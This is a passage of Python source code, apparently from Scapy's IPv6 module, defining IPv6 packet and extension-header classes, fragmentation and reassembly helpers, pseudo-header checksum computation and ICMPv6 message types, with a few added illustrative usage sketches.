51:"AH Header",
58:"ICMPv6",
59:"No Next Header",
60:"Destination Option Header",
132:"SCTP",
135:"Mobility Header"}
ipv6nhcls = { 0: "IPv6ExtHdrHopByHop",
4: "IP",
6: "TCP",
17: "UDP",
43: "IPv6ExtHdrRouting",
44: "IPv6ExtHdrFragment",
#50: "IPv6ExtHrESP",
#51: "IPv6ExtHdrAH",
58: "ICMPv6Unknown",
59: "Raw",
60: "IPv6ExtHdrDestOpt" }
class IP6ListField(StrField):
__slots__ = ["count_from", "length_from"]
islist = 1
def __init__(self, name, default, count_from=None, length_from=None):
if default is None:
default = []
StrField.__init__(self, name, default)
self.count_from = count_from
self.length_from = length_from
def i2len(self, pkt, i):
return 16*len(i)
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
lst = []
ret = ""
remain = s
if l is not None:
remain,ret = s[:l],s[l:]
while remain:
if c is not None:
if c <= 0:
break
c -= 1
addr = inet_ntop(socket.AF_INET6, remain[:16])
lst.append(addr)
remain = remain[16:]
return remain+ret,lst
def i2m(self, pkt, x):
s = ''
for y in x:
try:
y = inet_pton(socket.AF_INET6, y)
except:
y = socket.getaddrinfo(y, None, socket.AF_INET6)[0][-1][0]
y = inet_pton(socket.AF_INET6, y)
s += y
return s
def i2repr(self,pkt,x):
s = []
if x == None:
return "[]"
for y in x:
s.append('%s' % y)
return "[ %s ]" % (", ".join(s))
class _IPv6GuessPayload:
name = "Dummy class that implements guess_payload_class() for IPv6"
def default_payload_class(self,p):
if self.nh == 58: # ICMPv6
t = ord(p[0])
if len(p) > 2 and t == 139 or t == 140: # Node Info Query
return _niquery_guesser(p)
if len(p) >= icmp6typesminhdrlen.get(t, sys.maxint): # Other ICMPv6 messages
return get_cls(icmp6typescls.get(t,"Raw"), "Raw")
return Raw
elif self.nh == 135 and len(p) > 3: # Mobile IPv6
return _mip6_mhtype2cls.get(ord(p[2]), MIP6MH_Generic)
else:
return get_cls(ipv6nhcls.get(self.nh,"Raw"), "Raw")
class IPv6(_IPv6GuessPayload, Packet, IPTools):
name = "IPv6"
fields_desc = [ BitField("version" , 6 , 4),
BitField("tc", 0, 8), #TODO: IPv6, ByteField ?
BitField("fl", 0, 20),
ShortField("plen", None),
ByteEnumField("nh", 59, ipv6nh),
ByteField("hlim", 64),
SourceIP6Field("src", "dst"), # dst is for src @ selection
DestIP6Field("dst", "::1") ]
def route(self):
dst = self.dst
if isinstance(dst,Gen):
dst = iter(dst).next()
return conf.route6.route(dst)
def mysummary(self):
return "%s > %s (%i)" % (self.src,self.dst, self.nh)
def post_build(self, p, pay):
p += pay
if self.plen is None:
l = len(p) - 40
p = p[:4]+struct.pack("!H", l)+p[6:]
return p
def extract_padding(self, s):
l = self.plen
return s[:l], s[l:]
def hashret(self):
if self.nh == 58 and isinstance(self.payload, _ICMPv6):
if self.payload.type < 128:
return self.payload.payload.hashret()
elif (self.payload.type in [133,134,135,136,144,145]):
return struct.pack("B", self.nh)+self.payload.hashret()
nh = self.nh
sd = self.dst
ss = self.src
if self.nh == 43 and isinstance(self.payload, IPv6ExtHdrRouting):
# With routing header, the destination is the last
# address of the IPv6 list if segleft > 0
nh = self.payload.nh
try:
sd = self.addresses[-1]
except IndexError:
sd = '::1'
# TODO: big bug with ICMPv6 error messages as the destination of IPerror6
# could be anything from the original list ...
if 1:
sd = inet_pton(socket.AF_INET6, sd)
for a in self.addresses:
a = inet_pton(socket.AF_INET6, a)
sd = strxor(sd, a)
sd = inet_ntop(socket.AF_INET6, sd)
if self.nh == 44 and isinstance(self.payload, IPv6ExtHdrFragment):
nh = self.payload.nh
if self.nh == 0 and isinstance(self.payload, IPv6ExtHdrHopByHop):
nh = self.payload.nh
if self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt):
foundhao = None
for o in self.payload.options:
if isinstance(o, HAO):
foundhao = o
if foundhao:
nh = self.payload.nh # XXX what if another extension follows ?
ss = foundhao.hoa
if conf.checkIPsrc and conf.checkIPaddr and not in6_ismaddr(sd):
sd = inet_pton(socket.AF_INET6, sd)
ss = inet_pton(socket.AF_INET6, self.src)
return strxor(sd, ss) + struct.pack("B", nh) + self.payload.hashret()
else:
return struct.pack("B", nh)+self.payload.hashret()
def answers(self, other):
if not isinstance(other, IPv6): # self is reply, other is request
return False
if conf.checkIPaddr:
ss = inet_pton(socket.AF_INET6, self.src)
sd = inet_pton(socket.AF_INET6, self.dst)
os = inet_pton(socket.AF_INET6, other.src)
od = inet_pton(socket.AF_INET6, other.dst)
# request was sent to a multicast address (other.dst)
# Check reply destination addr matches request source addr (i.e
# sd == os) except when reply is multicasted too
# XXX test mcast scope matching ?
if in6_ismaddr(other.dst):
if in6_ismaddr(self.dst):
if ((od == sd) or
(in6_isaddrllallnodes(self.dst) and in6_isaddrllallservers(other.dst))):
return self.payload.answers(other.payload)
return False
if (os == sd):
return self.payload.answers(other.payload)
return False
elif (sd != os): # or ss != od): <- removed for ICMP errors
return False
if self.nh == 58 and isinstance(self.payload, _ICMPv6) and self.payload.type < 128:
# ICMPv6 Error message -> generated by IPv6 packet
# Note : at the moment, we jump the ICMPv6 specific class
# to call answers() method of erroneous packet (over
# initial packet). There can be cases where an ICMPv6 error
# class could implement a specific answers method that perform
# a specific task. Currently, don't see any use ...
return self.payload.payload.answers(other)
elif other.nh == 0 and isinstance(other.payload, IPv6ExtHdrHopByHop):
return self.payload.answers(other.payload.payload)
elif other.nh == 44 and isinstance(other.payload, IPv6ExtHdrFragment):
return self.payload.answers(other.payload.payload)
elif other.nh == 43 and isinstance(other.payload, IPv6ExtHdrRouting):
return self.payload.answers(other.payload.payload) # Buggy if self.payload is a IPv6ExtHdrRouting
elif other.nh == 60 and isinstance(other.payload, IPv6ExtHdrDestOpt):
return self.payload.payload.answers(other.payload.payload)
elif self.nh == 60 and isinstance(self.payload, IPv6ExtHdrDestOpt): # BU in reply to BRR, for instance
return self.payload.payload.answers(other.payload)
else:
if (self.nh != other.nh):
return False
return self.payload.answers(other.payload)
def inet6_register_l3(l2, l3):
return getmacbyip6(l3.dst)
conf.neighbor.register_l3(Ether, IPv6, inet6_register_l3)
class IPerror6(IPv6):
name = "IPv6 in ICMPv6"
def answers(self, other):
if not isinstance(other, IPv6):
return False
sd = inet_pton(socket.AF_INET6, self.dst)
ss = inet_pton(socket.AF_INET6, self.src)
od = inet_pton(socket.AF_INET6, other.dst)
os = inet_pton(socket.AF_INET6, other.src)
# Make sure that the ICMPv6 error is related to the packet scapy sent
if isinstance(self.underlayer, _ICMPv6) and self.underlayer.type < 128:
# find upper layer for self (possible citation)
selfup = self.payload
while selfup is not None and isinstance(selfup, _IPv6ExtHdr):
selfup = selfup.payload
# find upper layer for other (initial packet). Also look for RH
otherup = other.payload
request_has_rh = False
while otherup is not None and isinstance(otherup, _IPv6ExtHdr):
if isinstance(otherup, IPv6ExtHdrRouting):
request_has_rh = True
otherup = otherup.payload
if ((ss == os and sd == od) or # <- Basic case
(ss == os and request_has_rh)): # <- Request has a RH :
# don't check dst address
# Let's deal with possible MSS Clamping
if (isinstance(selfup, TCP) and
isinstance(otherup, TCP) and
selfup.options != otherup.options): # seems clamped
# Save fields modified by MSS clamping
old_otherup_opts = otherup.options
old_otherup_cksum = otherup.chksum
old_otherup_dataofs = otherup.dataofs
old_selfup_opts = selfup.options
old_selfup_cksum = selfup.chksum
old_selfup_dataofs = selfup.dataofs
# Nullify them
otherup.options = []
otherup.chksum = 0
otherup.dataofs = 0
selfup.options = []
selfup.chksum = 0
selfup.dataofs = 0
# Test it and save result
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
res = s1[:l] == s2[:l]
# recall saved values
otherup.options = old_otherup_opts
otherup.chksum = old_otherup_cksum
otherup.dataofs = old_otherup_dataofs
selfup.options = old_selfup_opts
selfup.chksum = old_selfup_cksum
selfup.dataofs = old_selfup_dataofs
return res
s1 = str(selfup)
s2 = str(otherup)
l = min(len(s1), len(s2))
return s1[:l] == s2[:l]
return False
def mysummary(self):
return Packet.mysummary(self)
#############################################################################
#############################################################################
### Upper Layer Checksum computation ###
#############################################################################
#############################################################################
class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation
name = "Pseudo IPv6 Header"
fields_desc = [ IP6Field("src", "::"),
IP6Field("dst", "::"),
ShortField("uplen", None),
BitField("zero", 0, 24),
ByteField("nh", 0) ]
def in6_chksum(nh, u, p):
"""
Performs IPv6 Upper Layer checksum computation. Provided parameters are:
- 'nh' : value of upper layer protocol
- 'u'  : upper layer instance (TCP, UDP, ICMPv6*, ...). The instance must be
provided with all its underlayers (IPv6 and all extension headers,
for example)
- 'p'  : the payload of the upper layer provided as a string
The function operates by filling a pseudo header class instance (PseudoIPv6)
with:
- the Next Header value
- the address of the _final_ destination (if a Routing Header with a
non-zero segleft field is present in the underlayer classes, the last
address is used)
- the address of the _real_ source (basically the source address of the
IPv6 class instance available in the underlayer, or the source address
in the HAO option if a Destination Options header found in the underlayer
includes this option)
- the length of the provided payload string ('p')
"""
ph6 = PseudoIPv6()
ph6.nh = nh
rthdr = 0
hahdr = 0
final_dest_addr_found = 0
while u != None and not isinstance(u, IPv6):
if (isinstance(u, IPv6ExtHdrRouting) and
u.segleft != 0 and len(u.addresses) != 0 and
final_dest_addr_found == 0):
rthdr = u.addresses[-1]
final_dest_addr_found = 1
elif (isinstance(u, IPv6ExtHdrDestOpt) and (len(u.options) == 1) and
isinstance(u.options[0], HAO)):
hahdr = u.options[0].hoa
u = u.underlayer
if u is None:
warning("No IPv6 underlayer to compute checksum. Leaving null.")
return 0
if hahdr:
ph6.src = hahdr
else:
ph6.src = u.src
if rthdr:
ph6.dst = rthdr
else:
ph6.dst = u.dst
ph6.uplen = len(p)
ph6s = str(ph6)
return checksum(ph6s+p)
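# --- Illustrative usage sketch (not part of the original module) ---
# How in6_chksum() is typically used: an upper layer's post_build() hands it
# the protocol number, an instance attached to its underlayers, and the raw
# upper-layer bytes with a zeroed checksum field. The helper below is a
# hypothetical example and assumes UDP is available from scapy.layers.inet,
# as TCP already is elsewhere in this module.
def _example_in6_chksum_usage():
    # nh=17 is IPPROTO_UDP; chksum=0 keeps post_build() from filling it in,
    # so we can recompute the value manually through the pseudo-header.
    p = IPv6(src="2001:db8::1", dst="2001:db8::2")/UDP(sport=1024, dport=53, chksum=0)/"payload"
    raw_udp = str(p[UDP])                    # UDP header (checksum zeroed) + payload
    return in6_chksum(17, p[UDP], raw_udp)   # the value UDP's own post_build() would normally insert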
#############################################################################
#############################################################################
### Extension Headers ###
#############################################################################
#############################################################################
# Inherited by all extension header classes
class _IPv6ExtHdr(_IPv6GuessPayload, Packet):
name = 'Abstract IPV6 Option Header'
aliastypes = [IPv6, IPerror6] # TODO ...
#################### IPv6 options for Extension Headers #####################
_hbhopts = { 0x00: "Pad1",
0x01: "PadN",
0x04: "Tunnel Encapsulation Limit",
0x05: "Router Alert",
0x06: "Quick-Start",
0xc2: "Jumbo Payload",
0xc9: "Home Address Option" }
class _OTypeField(ByteEnumField):
"""
Modified ByteEnumField that displays information about the IPv6 option
based on its option type value (what nodes that process the option
should do if they do not understand it ...).
It is used by the Jumbo, Pad1, PadN, RouterAlert and HAO options.
"""
pol = {0x00: "00: skip",
0x40: "01: discard",
0x80: "10: discard+ICMP",
0xC0: "11: discard+ICMP not mcast"}
enroutechange = {0x00: "0: Don't change en-route",
0x20: "1: May change en-route" }
def i2repr(self, pkt, x):
s = self.i2s.get(x, repr(x))
polstr = self.pol[(x & 0xC0)]
enroutechangestr = self.enroutechange[(x & 0x20)]
return "%s [%s, %s]" % (s, polstr, enroutechangestr)
class HBHOptUnknown(Packet): # IPv6 Hop-By-Hop Option
name = "Scapy6 Unknown Option"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen) ]
def alignment_delta(self, curpos): # By default, no alignment requirement
"""
As specified in section 4.2 of RFC 2460, every option has
an alignment requirement usually expressed as xn+y, meaning
the Option Type must appear at an integer multiple of x octets
from the start of the header, plus y octets.
This function is given the current position from the
start of the header and returns the required padding length.
"""
return 0
class Pad1(Packet): # IPv6 Hop-By-Hop Option
name = "Pad1"
fields_desc = [ _OTypeField("otype", 0x00, _hbhopts) ]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class PadN(Packet): # IPv6 Hop-By-Hop Option
name = "PadN"
fields_desc = [_OTypeField("otype", 0x01, _hbhopts),
FieldLenField("optlen", None, length_of="optdata", fmt="B"),
StrLenField("optdata", "",
length_from = lambda pkt: pkt.optlen)]
def alignment_delta(self, curpos): # No alignment requirement
return 0
class RouterAlert(Packet): # RFC 2711 - IPv6 Hop-By-Hop Option
name = "Router Alert"
fields_desc = [_OTypeField("otype", 0x05, _hbhopts),
ByteField("optlen", 2),
ShortEnumField("value", None,
{ 0: "Datagram contains a MLD message",
1: "Datagram contains RSVP message",
2: "Datagram contains an Active Network message",
68: "NSIS NATFW NSLP",
69: "MPLS OAM",
65535: "Reserved" })]
# TODO : Check IANA has not defined new values for value field of RouterAlertOption
# TODO : Now that we have that option, we should do something in MLD class that need it
# TODO : IANA has defined ranges of values which can't be easily represented here.
# iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
def alignment_delta(self, curpos): # alignment requirement : 2n+0
x = 2 ; y = 0
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
name = "Jumbo Payload"
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
ByteField("optlen", 4),
IntField("jumboplen", None) ]
def alignment_delta(self, curpos): # alignment requirement : 4n+2
x = 4 ; y = 2
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
class HAO(Packet): # IPv6 Destination Options Header Option
name = "Home Address Option"
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
ByteField("optlen", 16),
IP6Field("hoa", "::") ]
def alignment_delta(self, curpos): # alignment requirement : 8n+6
x = 8 ; y = 6
delta = x*((curpos - y + x - 1)/x) + y - curpos
return delta
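# --- Illustrative sketch (not part of the original module) ---
# The alignment_delta() methods above all apply the same formula for an
# "xn + y" requirement: the padding needed so the option starts at a
# position congruent to y modulo x. For example, a HAO option (8n + 6)
# that would otherwise start at offset 2 needs 4 bytes of padding.
def _example_alignment_delta(curpos, x=8, y=6):
    # Returns the number of padding octets to insert before the option.
    if x == 0:
        return 0
    return x * ((curpos - y + x - 1) / x) + y - curpos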
_hbhoptcls = { 0x00: Pad1,
0x01: PadN,
0x05: RouterAlert,
0xC2: Jumbo,
0xC9: HAO }
######################## Hop-by-Hop Extension Header ########################
class _HopByHopOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def i2len(self, pkt, i):
l = len(self.i2m(pkt, i))
return l
def i2count(self, pkt, i):
if type(i) is list:
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
opt = []
ret = ""
x = s
if l is not None:
x,ret = s[:l],s[l:]
while x:
if c is not None:
if c <= 0:
break
c -= 1
o = ord(x[0]) # Option type
cls = self.cls
if _hbhoptcls.has_key(o):
cls = _hbhoptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = ""
return x+ret,opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return "".join(map(str, x))
curpos = self.curpos
s = ""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
pstr = str(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += str(Pad1())
elif d != 0:
s += str(PadN(optdata='\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class _PhantomAutoPadField(ByteField):
def addfield(self, pkt, s, val):
return s
def getfield(self, pkt, s):
return s, 1
def i2repr(self, pkt, x):
if x:
return "On"
return "Off"
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 0 }}
######################## Destination Option Header ##########################
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
name = "IPv6 Extension Header - Destination Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)/8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 60 }}
############################# Routing Header ################################
class IPv6ExtHdrRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Routing"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, count_of="addresses", fmt="B",
adjust = lambda pkt,x:2*x), # in 8 bytes blocks
ByteField("type", 0),
ByteField("segleft", None),
BitField("reserved", 0, 32), # There is meaning in this field ...
IP6ListField("addresses", [],
length_from = lambda pkt: 8*pkt.len)]
overload_fields = {IPv6: { "nh": 43 }}
def post_build(self, pkt, pay):
if self.segleft is None:
pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
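# --- Illustrative sketch (not part of the original module) ---
# Building a type 0 Routing header: 'segleft' and 'len' are left to None and
# filled in by the post_build()/length adjustment above. The addresses are
# documentation values.
def _example_routing_header():
    rh = IPv6ExtHdrRouting(addresses=["2001:db8::10", "2001:db8::20"])
    return IPv6(dst="2001:db8::1")/rh/ICMPv6EchoRequest()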
########################### Fragmentation Header ############################
class IPv6ExtHdrFragment(_IPv6ExtHdr):
name = "IPv6 Extension Header - Fragmentation header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None) ]
overload_fields = {IPv6: { "nh": 44 }}
def defragment6(pktlist):
"""
Performs defragmentation of a list of IPv6 packets. Packets are reordered.
Fragments that do not belong are dropped, and missing data is replaced by 'X' characters.
"""
l = filter(lambda x: IPv6ExtHdrFragment in x, pktlist) # remove non fragments
if not l:
return []
id = l[0][IPv6ExtHdrFragment].id
llen = len(l)
l = filter(lambda x: x[IPv6ExtHdrFragment].id == id, l)
if len(l) != llen:
warning("defragment6: some fragmented packets have been removed from list")
llen = len(l)
# reorder fragments
i = 0
res = []
while l:
min_pos = 0
min_offset = l[0][IPv6ExtHdrFragment].offset
for pos, p in enumerate(l):
cur_offset = p[IPv6ExtHdrFragment].offset
if cur_offset < min_offset:
min_pos = pos # remember the index of the fragment with the smallest offset
min_offset = cur_offset
res.append(l[min_pos])
del(l[min_pos])
# regenerate the fragmentable part
fragmentable = ""
for p in res:
q=p[IPv6ExtHdrFragment]
offset = 8*q.offset
if offset != len(fragmentable):
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
fragmentable += "X"*(offset - len(fragmentable))
fragmentable += str(q.payload)
# Regenerate the unfragmentable part.
q = res[0]
nh = q[IPv6ExtHdrFragment].nh
q[IPv6ExtHdrFragment].underlayer.nh = nh
del q[IPv6ExtHdrFragment].underlayer.payload
q /= conf.raw_layer(load=fragmentable)
return IPv6(str(q))
def fragment6(pkt, fragSize):
"""
Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already
contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected
maximum size of fragments (MTU). The list of packets is returned.
If the packet does not contain an IPv6ExtHdrFragment class, it is returned
unmodified as the single element of the result list.
"""
pkt = pkt.copy()
if not IPv6ExtHdrFragment in pkt:
# TODO : automatically add a fragment before upper Layer
# at the moment, we do nothing and return initial packet
# as single element of a list
return [pkt]
# If the payload is bigger than 65535, a Jumbo payload must be used, as
# an IPv6 packet can't be bigger than 65535 bytes.
if len(str(pkt[IPv6ExtHdrFragment])) > 65535:
warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")
return []
s = str(pkt) # for instantiation to get upper layer checksum right
if len(s) <= fragSize:
return [pkt]
# Fragmentable part : fake IPv6 for Fragmentable part length computation
fragPart = pkt[IPv6ExtHdrFragment].payload
tmp = str(IPv6(src="::1", dst="::1")/fragPart)
fragPartLen = len(tmp) - 40 # basic IPv6 header length
fragPartStr = s[-fragPartLen:]
# Grab Next Header for use in Fragment Header
nh = pkt[IPv6ExtHdrFragment].nh
# Keep fragment header
fragHeader = pkt[IPv6ExtHdrFragment]
del fragHeader.payload # detach payload
# Unfragmentable Part
unfragPartLen = len(s) - fragPartLen - 8
unfragPart = pkt
del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
# Cut the fragmentable part to fit fragSize. Inner fragments have
# a length that is an integer multiple of 8 octets; the last fragment
# can be anything below the MTU.
lastFragSize = fragSize - unfragPartLen - 8
innerFragSize = lastFragSize - (lastFragSize % 8)
if lastFragSize <= 0 or innerFragSize == 0:
warning("Provided fragment size value is too low. " +
"Should be more than %d" % (unfragPartLen + 8))
return [unfragPart/fragHeader/fragPart]
remain = fragPartStr
res = []
fragOffset = 0 # offset, incremented during creation
fragId = random.randint(0,0xffffffff) # random id ...
if fragHeader.id is not None: # ... except id provided by user
fragId = fragHeader.id
fragHeader.m = 1
fragHeader.id = fragId
fragHeader.nh = nh
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
while True:
if (len(remain) > lastFragSize):
tmp = remain[:innerFragSize]
remain = remain[innerFragSize:]
fragHeader.offset = fragOffset # update offset
fragOffset += (innerFragSize / 8) # compute new one
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp)
res.append(tempo)
else:
fragHeader.offset = fragOffset # update offset
fragHeader.m = 0
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=remain)
res.append(tempo)
break
return res
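# --- Illustrative sketch (not part of the original module) ---
# fragment6() and defragment6() are intended to round-trip: the packet must
# already carry an IPv6ExtHdrFragment so fragment6() knows where to split.
# The helper name and sizes below are examples only.
def _example_fragment6_roundtrip():
    big = IPv6(dst="2001:db8::1")/IPv6ExtHdrFragment()/UDP(dport=9)/("X" * 3000)
    frags = fragment6(big, 1280)   # list of IPv6 packets, each <= 1280 bytes
    return defragment6(frags)      # single reassembled IPv6 packet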
############################### AH Header ###################################
# class _AHFieldLenField(FieldLenField):
# def getfield(self, pkt, s):
# l = getattr(pkt, self.fld)
# l = (l*8)-self.shift
# i = self.m2i(pkt, s[:l])
# return s[l:],i
# class _AHICVStrLenField(StrLenField):
# def i2len(self, pkt, x):
# class IPv6ExtHdrAH(_IPv6ExtHdr):
# name = "IPv6 Extension Header - AH"
# fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
# _AHFieldLenField("len", None, "icv"),
# ShortField("res", 0),
# IntField("spi", 0),
# IntField("sn", 0),
# _AHICVStrLenField("icv", None, "len", shift=2) ]
# overload_fields = {IPv6: { "nh": 51 }}
# def post_build(self, pkt, pay):
# if self.len is None:
# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
# if self.segleft is None:
# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
# return _IPv6ExtHdr.post_build(self, pkt, pay)
############################### ESP Header ##################################
# class IPv6ExtHdrESP(_IPv6extHdr):
# name = "IPv6 Extension Header - ESP"
# fields_desc = [ IntField("spi", 0),
# IntField("sn", 0),
# # there is things to extract from IKE work
# ]
# overloads_fields = {IPv6: { "nh": 50 }}
#############################################################################
#############################################################################
### ICMPv6* Classes ###
#############################################################################
#############################################################################
icmp6typescls = { 1: "ICMPv6DestUnreach",
2: "ICMPv6PacketTooBig",
3: "ICMPv6TimeExceeded",
4: "ICMPv6ParamProblem",
128: "ICMPv6EchoRequest",
129: "ICMPv6EchoReply",
130: "ICMPv6MLQuery",
131: "ICMPv6MLReport",
132: "ICMPv6MLDone",
133: "ICMPv6ND_RS",
134: "ICMPv6ND_RA",
135: "ICMPv6ND_NS",
136: "ICMPv6ND_NA",
137: "ICMPv6ND_Redirect",
#138: Do Me - RFC 2894 - Seems painful
139: "ICMPv6NIQuery",
140: "ICMPv6NIReply",
141: "ICMPv6ND_INDSol",
142: "ICMPv6ND_INDAdv",
#143: Do Me - RFC 3810
144: "ICMPv6HAADRequest",
145: "ICMPv6HAADReply",
146: "ICMPv6MPSol",
147: "ICMPv6MPAdv",
#148: Do Me - SEND related - RFC 3971
#149: Do Me - SEND related - RFC 3971
151: "ICMPv6MRD_Advertisement",
152: "ICMPv6MRD_Solicitation",
153: "ICMPv6MRD_Termination",
}
icmp6typesminhdrlen = { 1: 8,
2: 8,
3: 8,
4: 8,
128: 8,
129: 8,
130: 24,
131: 24,
132: 24,
133: 8,
134: 16,
135: 24,
136: 24,
137: 40,
#139:
#140
141: 8,
142: 8,
144: 8,
145: 8,
146: 8,
147: 8,
151: 8,
152: 4,
153: 4
}
icmp6types = { 1 : "Destination unreachable",
2 : "Packet too big",
3 : "Time exceeded",
4 : "Parameter problem",
100 : "Private Experimentation",
101 : "Private Experimentation",
128 : "Echo Request",
129 : "Echo Reply",
130 : "MLD Query",
131 : "MLD Report",
132 : "MLD Done",
133 : "Router Solicitation",
134 : "Router Advertisement",
135 : "Neighbor Solicitation",
136 : "Neighbor Advertisement",
137 : "Redirect Message",
138 : "Router Renumbering",
139 : "ICMP Node Information Query",
140 : "ICMP Node Information Response",
141 : "Inverse Neighbor Discovery Solicitation Message",
142 : "Inverse Neighbor Discovery Advertisement Message",
143 : "Version 2 Multicast Listener Report",
144 : "Home Agent Address Discovery Request Message",
145 : "Home Agent Address Discovery Reply Message",
146 : "Mobile Prefix Solicitation",
147 : "Mobile Prefix Advertisement",
148 : "Certification Path Solicitation",
149 : "Certification Path Advertisement",
151 : "Multicast Router Advertisement",
152 : "Multicast Router Solicitation",
153 : "Multicast Router Termination",
200 : "Private Experimentation",
201 : "Private Experimentation" }
class _ICMPv6(Packet):
name = "ICMPv6 dummy class"
overload_fields = {IPv6: {"nh": 58}}
def post_build(self, p, pay):
p += pay
if self.cksum == None:
chksum = in6_chksum(58, self.underlayer, p)
p = p[:2]+struct.pack("!H", chksum)+p[4:]
return p
def hashret(self):
return self.payload.hashret()
def answers(self, other):
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
if (isinstance(self.underlayer, IPerror6) or
isinstance(self.underlayer, _IPv6ExtHdr) and
isinstance(other, _ICMPv6)):
if not ((self.type == other.type) and
(self.code == other.code)):
return 0
return 1
return 0
class _ICMPv6Error(_ICMPv6):
name = "ICMPv6 errors dummy class"
def guess_payload_class(self,p):
return IPerror6
class ICMPv6Unknown(_ICMPv6):
name = "Scapy6 ICMPv6 fallback class"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
StrField("msgbody", "")]
################################## RFC 2460 #################################
class ICMPv6DestUnreach(_ICMPv6Error):
name = "ICMPv6 Destination Unreachable"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteEnumField("code",0, { 0: "No route to destination",
1: "Communication with destination administratively prohibited",
2: "Beyond scope of source address",
3: "Address unreachable",
4: "Port unreachable" }),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
class ICMPv6PacketTooBig(_ICMPv6Error):
name = "ICMPv6 Packet Too Big"
fields_desc = [ ByteEnumField("type",2, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("mtu",1280)]
class ICMPv6TimeExceeded(_ICMPv6Error):
name = "ICMPv6 Time Exceeded"
fields_desc = [ ByteEnumField("type",3, icmp6types),
ByteEnumField("code",0, { 0: "hop limit exceeded in transit",
1: "fragment reassembly time exceeded"}),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
# The default pointer value is set to the next header field of
# the encapsulated IPv6 packet
class ICMPv6ParamProblem(_ICMPv6Error):
name = "ICMPv6 Parameter Problem"
fields_desc = [ ByteEnumField("type",4, icmp6types),
ByteEnumField("code",0, {0: "erroneous header field encountered",
1: "unrecognized Next Header type encountered",
2: "unrecognized IPv6 option encountered"}),
XShortField("cksum", None),
IntField("ptr",6)]
class ICMPv6EchoRequest(_ICMPv6):
name = "ICMPv6 Echo Request"
fields_desc = [ ByteEnumField("type", 128, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id",0),
XShortField("seq",0),
StrField("data", "")]
def mysummary(self):
return self.sprintf("%name% (id: %id% seq: %seq%)")
def hashret(self):
return struct.pack("HH",self.id,self.seq)+self.payload.hashret()
class ICMPv6EchoReply(ICMPv6EchoRequest):
name = "ICMPv6 Echo Reply"
